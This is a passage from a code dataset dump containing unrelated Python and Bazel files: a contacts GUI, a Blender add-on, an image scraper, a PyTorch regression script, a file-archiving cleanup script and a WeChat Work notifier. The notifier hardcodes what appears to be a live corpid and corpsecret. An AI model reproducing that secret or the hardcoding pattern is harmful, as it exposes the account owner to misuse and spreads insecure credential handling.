justify=LEFT)).pack()\n Button(frame, text='Посмотреть все контакты', bg='#FF8C00', command=getAllContacts).pack()\n Button(frame, text='Создать контакт', bg='#FF8C00', command=createContacts).pack()\n Button(frame, text=\"Удалить по имени и фамилии\", bg='#FF8C00', command=deleteContactByNameAndSurname).pack()\n Button(frame, text=\"Фильтр контактов\", bg='#FF8C00', command=filterContacts).pack()\n Button(frame, text=\"Узнать сколько лет\", bg='#FF8C00', command=getAge).pack()\n Button(frame, text=\"Изменить 
контакт\", bg='#FF8C00', command=updateContact).pack()\n Button(frame, text=\"Удалить контакт по номеру\", bg='#FF8C00', command=deleteContactByNumber).pack()\n Button(frame, text=\"Скоро день рождения\", bg='#FF8C00', command=soonBirthday).pack()\n Button(frame, text=\"Узнать контакты по N лет\", bg='#FF8C00', command=differenceBirthday).pack()\n Button(frame, text=\"Поиск по месяцу и дню рождения\", bg='#FF8C00', command=searchBirthday).pack()\n\n root.mainloop()\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":13181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"334065021","text":"from tkinter import *\n\ndef doit():\n global x\n x+=1\n txt1.delete(1.0, END)\n txt1.insert(0.0,x)\n\nroot=Tk()\nroot.geometry(\"300x190\")\n\nLabel(root,width=10).grid(row=0,column=0)\nLabel(root).grid(row=1,column=0)\nLabel(root).grid(row=2,column=0)\nLabel(root).grid(row=3,column=0)\n\nButton(root,text=\"Enter\",width=15,height=2,command=doit).grid(row=3,column=1)\ntxt1=Text(root,width=20,height=2)\ntxt1.grid(row=1,column=1)\nroot.bind(\"\", lambda event: doit())\n\nx=0\n\nroot.mainloop()\n","sub_path":"Python Pgms/New folder/Python/skel2.py","file_name":"skel2.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"431552215","text":"import bpy, imp\n\nfrom easyGame import easyMaterial\nfrom easyGame import easyAsset\n\nimp.reload(easyMaterial)\nimp.reload(easyAsset)\n\n\nbl_info = {\n\t\"name\": \"Easy Game Collection\",\n\t\"author\": \"Mike Pan\",\n\t\"version\": (1, 2),\n\t\"blender\": (2, 70, 0),\n\t\"location\": \"View3D > Tool Shelf > Easy Tabs\",\n\t\"description\": \"Help make the game-creation process simpler.\",\n\t\"warning\": \"\",\n\t\"wiki_url\": \"\",\n\t\"category\": \"Game Engine\"\n}\n\n\n\ndef register():\n\tbpy.utils.register_class(BLEasyMaterial)\n\tbpy.utils.register_class(BLEasyMaterialAdv)\n\tbpy.utils.register_class(BLEasyAsset)\n\t# bpy.utils.register_class(BLSettings)\n\tbpy.utils.register_class(BLEasyMaterialCreate)\n\tbpy.utils.register_class(BLEasyAssetCreate)\n\n\ndef unregister():\n\tbpy.utils.unregister_class(BLEasyMaterial)\n\tbpy.utils.unregister_class(BLEasyMaterialAdv)\n\tbpy.utils.unregister_class(BLEasyAsset)\n\t# bpy.utils.unregister_class(BLSettings)\n\tbpy.utils.unregister_class(BLEasyMaterialCreate)\n\tbpy.utils.unregister_class(BLEasyAssetCreate)\n\n\n\n###############################################################################\n\n\nclass GamePanel():\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'TOOLS'\n\n\t\nclass BLEasyMaterial(GamePanel, bpy.types.Panel):\n\t\"\"\"Creates the EasyMaterial UI\"\"\"\n\tbl_label = \"Easy Material\"\n\tbl_category = \"Easy Material\"\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobj = context.object\n\n\t\t# bail on wrong display mode\n\t\tif context.scene.game_settings.material_mode != 'GLSL':\n\t\t\trow = layout.row()\n\t\t\trow.label('EasyMaterial requires GLSL mode', icon='ERROR')\n\t\t\trow = layout.row()\n\t\t\trow.prop(context.scene.game_settings, 'material_mode', text='')\n\t\t\treturn\n\n\t\t# bail on no object (We don't want to use poll because that hides the panel)\n\t\tif not obj:\n\t\t\treturn\n\n\t\t# material datablock manager\n\t\trow = layout.row()\n\t\tlayout.template_ID_preview(obj, \"active_material\", new=\"easy.matcreate\")\n\n\t\t# material editor\n\t\trow = layout.row()\n\t\tfor materialSlot in 
context.active_object.material_slots:\n\t\t\tmat = materialSlot.material\n\n\t\t\t# bail code\n\t\t\tif not mat:\n\t\t\t\tcontinue\n\t\t\tif 'uberMaterial' not in mat:\n\t\t\t\trow.label('Not an UberMaterial', icon='ERROR')\n\t\t\t\tcontinue\n\n\t\t\t# edit albedo\n\t\t\trow = layout.row()\n\t\t\trow.prop(mat, 'diffuse_intensity', text='Albedo')\n\t\n\t\t\tmetallicTextureSlot = None\n\t\t\tfor textureSlot in mat.texture_slots:\n\t\t\t\tif textureSlot:\n\t\t\t\t\t# bail code\n\t\t\t\t\tif textureSlot.use_map_color_spec and textureSlot.blend_type == 'COLOR':\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\ttex = textureSlot.texture\n\t\t\t\t\ttext = tex.name.split('.')[-1]\n\t\t\t\t\tif text.isnumeric():\n\t\t\t\t\t\ttext = tex.name.split('.')[-2]\n\n\t\t\t\t\t# move to advanced section\n\t\t\t\t\tif text == 'Emit' or text == 'Alpha':\n\t\t\t\t\t\tcontinue\t\t\t\t\t\t\n\n\t\t\t\t\trow = layout.row()\n\t\t\t\t\t# enable/disable texture channel\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\trow = split.row()\n\t\t\t\t\trow.prop(textureSlot, 'use', text=text)\n\n\t\t\t\t\t# image browse control\n\t\t\t\t\trow = split.row()\n\t\t\t\t\trow.active = textureSlot.use\n\t\t\t\t\trow.template_ID(tex, \"image\", open=\"image.open\")\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\t\n\t\t\t\t\t# empty\n\t\t\t\t\trow = split.row()\n\t\t\t\t\t\n\t\t\t\t\tsplit.active = textureSlot.use\n\t\t\t\t\t# additional properties\n\t\t\t\t\tif text == 'Col':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'diffuse_color_factor', text='Factor')\n\t\t\t\t\t\tsplit.prop(mat, 'diffuse_color', text='')\n\t\t\t\t\tif text == 'Nor':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'normal_factor', text='Factor')\n\t\t\t\t\tif text == 'Gloss':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'default_value', text='Factor')\n\n\t\t\t\t\tif textureSlot.texture_coords == 'UV' and tex.image:\n\t\t\t\t\t\tsplit.prop_search(textureSlot, \"uv_layer\", context.active_object.data, \"uv_textures\", text=\"\")\n\n\nclass BLEasyMaterialAdv(GamePanel, bpy.types.Panel):\n\t\"\"\"Creates the EasyMaterial UI\"\"\"\n\tbl_label = \"Advanced\"\n\tbl_category = \"Easy Material\"\n\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn context.active_object\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobj = context.object\n\n\t\t# bail on no mat slot\n\t\tif not context.active_object.material_slots:\n\t\t\treturn\n\n\t\t# material editor\n\t\trow = layout.row()\n\t\tfor materialSlot in context.active_object.material_slots:\n\t\t\tmat = materialSlot.material\n\n\t\t\t# bail code\n\t\t\tif not mat:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif 'uberMaterial' not in mat:\n\t\t\t\t# row.label('Not an UberMaterial', icon='ERROR')\n\t\t\t\tcontinue\n\t\t\t\n\t\t\trow.prop(mat, 'use_transparency', 'Transparent')\n\t\t\tif mat.use_transparency:\n\t\t\t\trow.prop(mat, 'transparency_method', expand=True)\n\n\t\t\tfor textureSlot in mat.texture_slots:\n\t\t\t\tif textureSlot:\n\n\t\t\t\t\t# bail code\n\t\t\t\t\tif textureSlot.use_map_color_spec and textureSlot.blend_type == 'COLOR':\n\t\t\t\t\t\trow.prop(textureSlot, 'use', text='Metallic (Use color from Gloss map as Spec Color)')\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\trow = layout.row()\n\t\t\t\t\ttex = textureSlot.texture\n\t\t\t\t\ttext = tex.name.split('.')[-1]\n\t\t\t\t\tif text.isnumeric():\n\t\t\t\t\t\ttext = tex.name.split('.')[-2]\n\t\t\t\t\t\n\t\t\t\t\tif text != 'Emit' and text!= 'Alpha':\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t# enable/disable texture channel\n\t\t\t\t\tsplit = 
layout.split(percentage=0.20)\n\t\t\t\t\tsplit.prop(textureSlot, 'use', text=text)\n\n\t\t\t\t\t# image browse control\n\t\t\t\t\tsplit.template_ID(tex, \"image\", open=\"image.open\")\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\t\n\t\t\t\t\t# empty\n\t\t\t\t\trow = split.row()\n\n\t\t\t\t\t# additional properties\n\t\t\t\t\tif text == 'Emit':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'emit_factor', text='Factor')\n\t\t\t\t\t\n\t\t\t\t\tif textureSlot.texture_coords == 'UV' and tex.image:\n\t\t\t\t\t\tsplit.prop_search(textureSlot, \"uv_layer\", context.active_object.data, \"uv_textures\", text=\"\")\n\n\t\nclass BLEasyAsset(GamePanel, bpy.types.Panel):\n\t\"\"\"Creates The Easy Asset Interface\"\"\"\n\tbl_label = \"Easy Asset\"\n\tbl_context = \"objectmode\"\n\tbl_category = \"Easy Asset\"\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobj = context.object\n\n\t\trow = layout.row()\n\t\trow.label('Create Camera')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='FPS Camera').arg = 'camera.fps'\n\t\trow.operator(\"easy.assetcreate\", text='Orbit Camera').arg = 'camera.orbit'\n\n\t\trow = layout.row()\n\t\trow.label('Create Lights')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='Day-Night Cycle').arg = 'light.cycle'\n\t\trow.operator(\"easy.assetcreate\", text='Soft Light').arg = 'light.soft'\n\t\t\n\t\trow = layout.row()\n\t\trow.label('Create Objects')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='Plane Mirror').arg = 'obj.mirror'\n\t\t# row.operator(\"easy.assetcreate\", text='Orbit Camera').arg = 'camera.orbit'\n\n\n\t\trow = layout.row()\n\t\trow.label('Effects')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='Post-Processing 2D Filters').arg = 'post.main'\n\n\t\trow = layout.row()\n\t\t\n\t\t# row.label('Assets:')\n\t\t# template_list now takes two new args.\n\t\t# The first one is the identifier of the registered UIList to use (if you want only the default list,\n\t\t# with no custom draw code, use \"UI_UL_list\").\n\t\t# layout.template_list(\"UI_UL_list\", \"assetid\", obj, \"material_slots\", obj, \"active_material_index\")\n\n\n\nclass BLEasyMaterialCreate(bpy.types.Operator):\n\t\"\"\"Create an übershader\"\"\"\n\tbl_label = \"New UberMaterial\"\n\tbl_idname = 'easy.matcreate'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\tMatName = bpy.props.StringProperty(name='Material Name', default='uber')\n\n\tdef execute(self, context):\n\t\terror = easyMaterial.sanityCheck(context)\n\t\tif not error:\n\t\t\tmat = easyMaterial.createMaterial(context, self.MatName)\n\t\t\teasyMaterial.assignMaterial(context, mat)\n\t\t\treturn {'FINISHED'}\n\t\telse:\n\t\t\tself.report({'ERROR'}, error)\n\t\t\treturn {'CANCELLED'}\n\n\nclass BLEasyAssetCreate(bpy.types.Operator):\n\t\"\"\"Create an asset\"\"\"\n\tbl_label = \"New Asset\"\n\tbl_idname = 'easy.assetcreate'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\targ = bpy.props.StringProperty()\n\t\n\tdef execute(self, context):\n\t\tobjType, option = self.arg.split('.')\n\t\t\n\t\t# cleanup before we start\n\t\tbpy.ops.object.select_all(action='DESELECT')\n\n\t\tif objType == 'camera':\n\t\t\terror = easyAsset.createCamera(option)\n\t\telif objType == 'light':\n\t\t\terror = easyAsset.createLight(option)\n\t\telif objType == 'obj':\n\t\t\terror = easyAsset.createObj(option)\n\t\telif objType == 'post':\n\t\t\terror = easyAsset.createPost(option)\n\t\telse:\n\t\t\terror = 'Sorry, not implemented yet.'\n\n\t\tif 
error:\n\t\t\tself.report({'ERROR'}, error)\n\t\t\treturn {'CANCELLED'}\n\t\telse:\n\t\t\treturn {'FINISHED'}\n\t\t\n\n","sub_path":"Addon/easyGame/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"257150668","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jarod Zheng'\n\n'''\nGet pictures from the website\n'''\n\nimport os\nimport re \nimport urllib \nfrom urllib import request\nfrom bs4 import BeautifulSoup\n\n\n#PATH = os.path.join(os.path.dirname(__file__), 'pic', '%s.jpg')\n\n'''\ndef getHtml(url): \n    req = request.Request(url)\n    req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') \n    page = request.urlopen(req) \n    html = page.read() \n    return html \n \ndef getImg(html): \n    reg = r'src=\"(.+?\\.jpg)\" ' \n    imgre = re.compile(reg) \n    html = html.decode('utf-8')\n    imglist = imgre.findall(html) \n    x = 0 \n    for imgurl in imglist: \n        urllib.request.urlretrieve(imgurl, PATH % x) \n        x = x + 1 \n    \n\n\n\n\nhtml = getHtml(\"https://tieba.baidu.com/p/1546249911\") \ngetImg(html)\nprint('Completed!!!')\n'''\n\n\nSource = ['http://tieba.baidu.com/p/1864966611', \n'http://tieba.baidu.com/p/1962466429', \n'http://tieba.baidu.com/p/1962466429?pid=25908281312&cid=0#25908281312', \n'http://tieba.baidu.com/p/2028824237', \n'http://tieba.baidu.com/p/2028824237?pid=26953482114&cid=0#26953482114',\n'http://tieba.baidu.com/p/2066742642', \n'http://tieba.baidu.com/p/2122598315', \n'http://tieba.baidu.com/p/2170607777', \n'http://tieba.baidu.com/p/2202869537']\n\nf = 370\n\nfor html_doc in Source:\n#html_doc = \"https://tieba.baidu.com/p/1794831901\"\n    \n    Temp_PATH = os.path.join(os.path.dirname(__file__), 'pic', '%s' % f)\n    os.makedirs(Temp_PATH)\n    PATH = os.path.join(Temp_PATH, '%s.jpg')\n\n\n\n\n    req = urllib.request.Request(html_doc) \n    webpage = urllib.request.urlopen(req) \n    html = webpage.read()\n\n\n    soup = BeautifulSoup(html, 'html.parser')\n\n\n    # grab the image URLs\n    # grab all img tags whose class is BDE_Image\n    img_src=soup.findAll(\"img\",{'class':'BDE_Image'})\n    \n    try:\n        x = 0 \n        for img in img_src:\n            urllib.request.urlretrieve(img.get('src'), PATH % x) \n            print(x)\n            x = x + 1 \n\n        #img=img.get('src') # grab the src\n        #print(img)\n    except urllib.error.URLError as e:\n        print('except:', e)\n    finally:\n        pass\n    print(f)\n    f = f+1\n\n\n\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"240529540","text":"# Copyright 2014 The Bazel Authors. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nGO_TOOLCHAIN_BUILD_FILE = \"\"\"\nload(\"@io_bazel_rules_go//go/private:go_root.bzl\", \"go_root\")\n\npackage(\n default_visibility = [ \"//visibility:public\" ])\n\nfilegroup(\n name = \"toolchain\",\n srcs = glob([\"bin/*\", \"pkg/**\", ]),\n)\n\nfilegroup(\n name = \"go_tool\",\n srcs = [ \"bin/go\" ],\n)\n\nfilegroup(\n name = \"go_src\",\n srcs = glob([\"src/**\"]),\n)\n\nfilegroup(\n name = \"go_include\",\n srcs = [ \"pkg/include\" ],\n)\n\ngo_root(\n name = \"go_root\",\n path = \"{goroot}\",\n)\n\"\"\"\n\ndef _go_sdk_repository_impl(ctx):\n ctx.download_and_extract(\n url = ctx.attr.url,\n stripPrefix = ctx.attr.strip_prefix,\n sha256 = ctx.attr.sha256)\n goroot = ctx.path(\".\")\n ctx.file(\"BUILD.bazel\", GO_TOOLCHAIN_BUILD_FILE.format(goroot = goroot))\n\ngo_sdk_repository = repository_rule(\n implementation = _go_sdk_repository_impl, \n attrs = {\n \"url\" : attr.string(),\n \"strip_prefix\" : attr.string(),\n \"sha256\" : attr.string(),\n })\n\ndef _go_repository_select_impl(ctx):\n os_name = ctx.os.name\n\n # 1. Configure the goroot path\n if os_name == 'linux':\n go_toolchain = ctx.attr.go_linux_version\n elif os_name == 'mac os x':\n go_toolchain = ctx.attr.go_darwin_version\n else:\n fail(\"Unsupported operating system: \" + os_name)\n if go_toolchain == None:\n fail(\"No Go toolchain provided for host operating system: \" + os_name)\n goroot = ctx.path(go_toolchain).dirname\n\n # 2. 
Create the symlinks.\n    ctx.symlink(goroot.get_child(\"bin\"), \"bin\")\n    ctx.symlink(goroot.get_child(\"pkg\"), \"pkg\")\n    ctx.symlink(goroot.get_child(\"src\"), \"src\")\n    ctx.symlink(goroot.get_child(\"BUILD.bazel\"), \"BUILD.bazel\")\n\n_go_repository_select = repository_rule(\n    _go_repository_select_impl,\n    attrs = {\n        \"go_linux_version\": attr.label(\n            allow_files = True,\n            single_file = True,\n        ),\n        \"go_darwin_version\": attr.label(\n            allow_files = True,\n            single_file = True,\n        ),\n    },\n)\n\ndef go_repository_select(\n    go_version = None,\n    go_linux = None,\n    go_darwin = None):\n  if not go_version and not go_linux and not go_darwin:\n    go_version = \"1.8.3\"\n\n  if go_version:\n    if go_linux:\n      fail(\"go_repositories: go_version and go_linux can't both be set\")\n    if go_darwin:\n      fail(\"go_repositories: go_version and go_darwin can't both be set\")\n    go_linux = \"@go%s.linux-amd64\" % go_version\n    go_darwin = \"@go%s.darwin-amd64\" % go_version\n\n  go_linux_version = go_linux + \"//:VERSION\" if go_linux else None\n  go_darwin_version = go_darwin + \"//:VERSION\" if go_darwin else None\n\n  _go_repository_select(\n      name = \"io_bazel_rules_go_toolchain\",\n      go_linux_version = go_linux_version,\n      go_darwin_version = go_darwin_version,\n  )\n","sub_path":"go/private/toolchain.bzl","file_name":"toolchain.bzl","file_ext":"bzl","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"529429128","text":"# add secret entry for DISCORD_TOKEN (bot)\n# add secret entry for TELEGRAM_TOKEN (bot)\n# add a new entry for secret TELEGRAM_CHILL_GROUP_INVITE with the link of the telegram group you want to send the pool\n\n\nChillServerGroupTest = -1\nTestChat = -2\n\n\n# Configure the channels and server here, from which you want to receive the messages.\n\nserversDict = {\n    \"⭐ChillServer\": {\n\t\t\t\"🤖bottest\": [ChillServerGroupTest, TestChat]\n\t\t}\n}\n\npollServDict = {\n\t\"⭐ChillServer\": {\n\t\t\"🤖bottest\": ChillServerGroupTest\n\t}\n}\n","sub_path":"conf-bkp.py","file_name":"conf-bkp.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"118435721","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 24 17:20:54 2017\n\n@author: pc\n\"\"\"\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndf = pd.read_excel(r\"/home/pc/上证指数数据.xlsx\")\n\ndf1 = df.iloc[:100, 3:6].values\nxtrain_features = torch.FloatTensor(df1)\ndf2 = df.iloc[1:101, 6].values\nxtrain_labels = torch.FloatTensor(df2)\nxtrain = torch.unsqueeze(xtrain_features, dim=1)\nytrain = torch.unsqueeze(xtrain_labels, dim=1)\nx, y = torch.autograd.Variable(xtrain), Variable(ytrain)\n\n\nclass Net(nn.Module):\n    def __init__(self, input_size, hidden_size, num_classes):\n        super(Net, self).__init__()\n        self.fc1 = nn.Linear(input_size, hidden_size)\n        self.relu = nn.ReLU()\n        self.fc2 = nn.Linear(hidden_size, num_classes)\n\n    def forward(self, x):\n        out = self.fc1(x)\n        out = self.relu(out)\n        out = self.fc2(out)\n        return out\n\n\n# input_size matches the three feature columns selected above (df.iloc[:, 3:6])\nnet = Net(input_size=3, hidden_size=100, num_classes=1)\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(net.parameters(), lr=0.005)\nfor epoch in range(100000):\n    inputs = x\n    target = y\n    out = net(inputs)\n    loss = criterion(out, target)\n    optimizer.zero_grad()\n    loss.backward()\n    optimizer.step()\n\n    if (epoch + 1) % 20 == 0:\n        print('Epoch[{}], loss: {:.6f}'.format(epoch + 1, loss.item()))\n\nnet.eval()\npredict = net(x)\npredict = predict.data.numpy()\nprint(predict)\n","sub_path":"pytorch/class/chapter12/pt02_feedforward_neural_network02.py","file_name":"pt02_feedforward_neural_network02.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"449516174","text":"class MyData:\n\n    title = None\n    description = None\n    fullText = None\n    date = None\n    source = None\n    url = None\n\n    def __str__(self):\n        return \"%s - %s\" % (self.date, self.title)\n\n\nclass MyDataList(list):\n\n    dummy = None\n\n    def __init__(self):\n        self.dummy = None\n\n    def __str__(self):\n        # join the items instead of printing them as a side effect\n        return \"\\n\".join(str(i) for i in self)\n\n\n","sub_path":"MyData.py","file_name":"MyData.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"399618394","text":"class Name:\n    def __init__(self):\n        print('Name id: %d' % id(self))\n\nx = Name()\ny = Name() * 10\n\n# Name id: 2475074859528\n# Name id: 2475074859192\n# Traceback (most recent call last):\n#   File \"F:\\FluentPython\\对象引用、可变性和垃圾回收\\ex8_2.py\", line 6, in <module>\n#     y = Name() * 10\n# TypeError: unsupported operand type(s) for *: 'Name' and 'int'\n# [Finished in 0.6s with exit code 1]\n","sub_path":"对象引用、可变性和垃圾回收/ex8_2.py","file_name":"ex8_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"141516886","text":"import json\nimport sys\n\nfrom api.sites import requests\n\n\nclass Token(object):\n    def get_token(self):\n        corpid = 'wxe4add0ebfde1dd98'\n        corpsecret = 'jBnxvmMzXSxrz3goqVw0tWgnBOrsfH2YWo9gKcETu92AbVdZAAnK80sXjnj3FQIn'\n        r = requests.get(\"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=%s&corpsecret=%s\" % (corpid, corpsecret))\n        access_token = r.json()['access_token']\n        return access_token\n\n\n# def send_message(content):\n#     url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + Token().get_token()\n#     payload = {\n#         \"touser\": \"@all\",\n#         \"msgtype\": \"text\",\n#         \"agentid\": 1,\n#         \"text\": {\n#             \"content\": '%s' % content\n#         },\n#         \"safe\": 0\n#     }\n#     r = requests.bak.post(url=url, data=json.dumps(payload))\n\n\ndef send_message(title, content, burl):\n    url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + Token().get_token()\n    payload = {\n        \"touser\": \"@all\",\n        \"msgtype\": \"news\",\n        \"agentid\": 1,\n        \"news\": {\n            \"articles\": [\n                {\n                    \"title\": \"%s\" % title,\n                    \"description\": \"%s\" % content,\n                    \"url\": \"%s\" % burl,\n                }\n            ]\n        }\n    }\n    r = requests.post(url=url, data=json.dumps(payload, ensure_ascii=False).encode('utf-8'))\n\n\nif __name__ == '__main__':\n    send_message(\"第%s次构建\" % sys.argv[1], '构建异常,请点击详情查看Console Output', sys.argv[2])\n","sub_path":"api/todo/monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"162560516","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport ctypes\nimport itertools\nimport os\nimport string\nimport platform\nimport shutil\nimport time \nimport sys\n\n#function checking if a disk is connected \ndef get_available_drives():\n    if 'Windows' not in platform.system():\n        return []\n    drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\n    return list(itertools.compress(string.ascii_uppercase,\n                           map(lambda x:ord(x) - ord('0'), bin(drive_bitmask)[:1:-1])))\n
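# e.g. get_available_drives() -> ['C', 'D', 'Z'] when drives C:, D: and Z: are mounted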
\n#checking if disk z is connected\nif 'Z' not in get_available_drives():\n    print (\"Connect Disk Z for program to work.\")\nelse:\n    print (\"Disk Z is connected. Program Started.\")\n\ndpath = r'D:\\archiv2\\temp'\nos.makedirs(dpath) \n\n# Clearing the catalog files on disk Z\npath1 = r'Z:\\spl\\result\\catalog.loc'\nopen(path1, 'w').close()\n\n# deleting everything in the folders calibrate, calibrate1 and locat\nfor folder in (r'Z:\\calibrate', r'Z:\\calibrate1', r'Z:\\locat'):\n    for the_file in os.listdir(folder):\n        file_path = os.path.join(folder, the_file)\n        try:\n            if os.path.isfile(file_path):\n                os.unlink(file_path)\n            #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n        except Exception as e:\n            print(e)\n\npath2 = r'Z:\\calibrate\\catalog.kal'\nopen(path2, 'w').close()\n\n# copy the dictionary files to the temp folder\nend = r'D:\\archiv2\\temp'\nfor dic_name in (\"KAT_OBS.DIC\", \"KAT_KAL.DIC\", \"KAT_KBO.DIC\"):\n    start = os.path.join(r\"D:\\LASER-2\\DATA\", dic_name)\n    shutil.copy(start, end)\n\n\n# In[32]:\n\n# copying the extension files\nsource_directory_path = r\"D:\\LASER-2\\DATA\"\ndestination_directory_path = r'D:\\archiv2\\temp'\n\n# str.endswith accepts a tuple, so one loop covers every extension\nfor source_filename in os.listdir(source_directory_path):\n    if source_filename.endswith((\".ega\", \".oga\", \".KGA\", \".LGA\", \".PGA\", \".CGA\", \".prn\")):\n        source_file_path = os.path.join(source_directory_path, source_filename)\n        shutil.copy(source_file_path, destination_directory_path)\n\n\n\n#getting specific extensions which start with T and K and have a number in them\nimport glob\npath3 = r\"D:\\LASER-2\\DATA\"\nos.chdir(path3)\nfiles = []\nfor file in glob.glob('T?*.K*[0-99]'):\n    files.append(file)\nsource = r'D:\\archiv2\\temp'\nfor u in files:\n    shutil.copy(u,source)\n\n#giving the temp folder a name with a date\nfrom datetime import datetime\ndirectory = r'D:\\archiv2'\nos.chdir(directory)\nname = r'temp'\nos.rename(name, datetime.today().strftime('%Y_%m_%d'))\n\n#archiving files\nshutil.make_archive(datetime.today().strftime('%Y_%m_%d'), 'zip', datetime.today().strftime('%Y_%m_%d'))\n\n# deleting the folder, leaving only the archived folder\nshutil.rmtree(datetime.today().strftime('%Y_%m_%d'))\n\ndirectory = r\"D:\\LASER-2\\DATA\"\nos.chdir(directory)\nopen('KAT_OBS.DIC', 'w').close()\nopen('KAT_KAL.DIC', 'w').close()\nopen('KAT_KBO.DIC', 'w').close()\n\n\nimport glob\n# one loop per glob pattern instead of a separate loop for each extension\nfor pattern in ('*ega', '*oga', '*KGA', '*LGA', '*PGA', '*CGA', '*prn', 'T?*.K*[0-99]'):\n    for file in glob.glob(pattern):\n        os.remove(file)\n\npath4 = r\"D:\\LASER-2\\DATA\"\nos.chdir(path4)\nfor file in glob.glob('T?*.K*[0-99]'):\n    os.remove(file)\n\nprint('program completed')\n\n","sub_path":"Catalagoue-Cleaning.py","file_name":"Catalagoue-Cleaning.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"222257609","text":"from dataclasses import dataclass, field\nfrom decimal import Decimal\nfrom enum import Enum\nfrom typing import List, Optional\n\n__NAMESPACE__ = \"http://www.bysquare.com/bysquare\"\n\n\n@dataclass\nclass BankAccount:\n    \"\"\"\n    single bank account.\n\n    :ivar iban: IBAN code\n    :ivar bic: SWIFT code\n    \"\"\"\n    iban: Optional[str] = field(\n        default=None,\n        metadata={\n            \"name\": \"IBAN\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n            \"required\": True,\n            \"pattern\": r\"[A-Z]{2}[0-9]{2}[A-Z0-9]{0,30}\",\n        }\n    )\n    bic: Optional[str] = field(\n        default=None,\n        metadata={\n            \"name\": \"BIC\",\n            \"type\": \"Element\",\n            \"namespace\": \"http://www.bysquare.com/bysquare\",\n            \"pattern\": r\"[A-Z]{4}[A-Z]{2}[A-Z\\d]{2}([A-Z\\d]{3})?\",\n        }\n    )\n\n\n@dataclass\nclass BySquareDocument:\n    pass\n\n\nclass DirectDebitScheme(Enum):\n    \"\"\"direct debit scheme, can be \"SEPA\" or \"other\".\n\n    Use \"SEPA\" if direct debit complies with SEPA direct debit scheme\n    \"\"\"\n    OTHER = \"other\"\n    SEPA = \"SEPA\"\n\n\nclass DirectDebitType(Enum):\n    \"\"\"\n    type of direct debit, can be \"one-off\" or \"recurrent\".\n    \"\"\"\n    ONE_OFF = \"one-off\"\n    RECURRENT = \"recurrent\"\n\n\nclass Month(Enum):\n    JANUARY = \"January\"\n    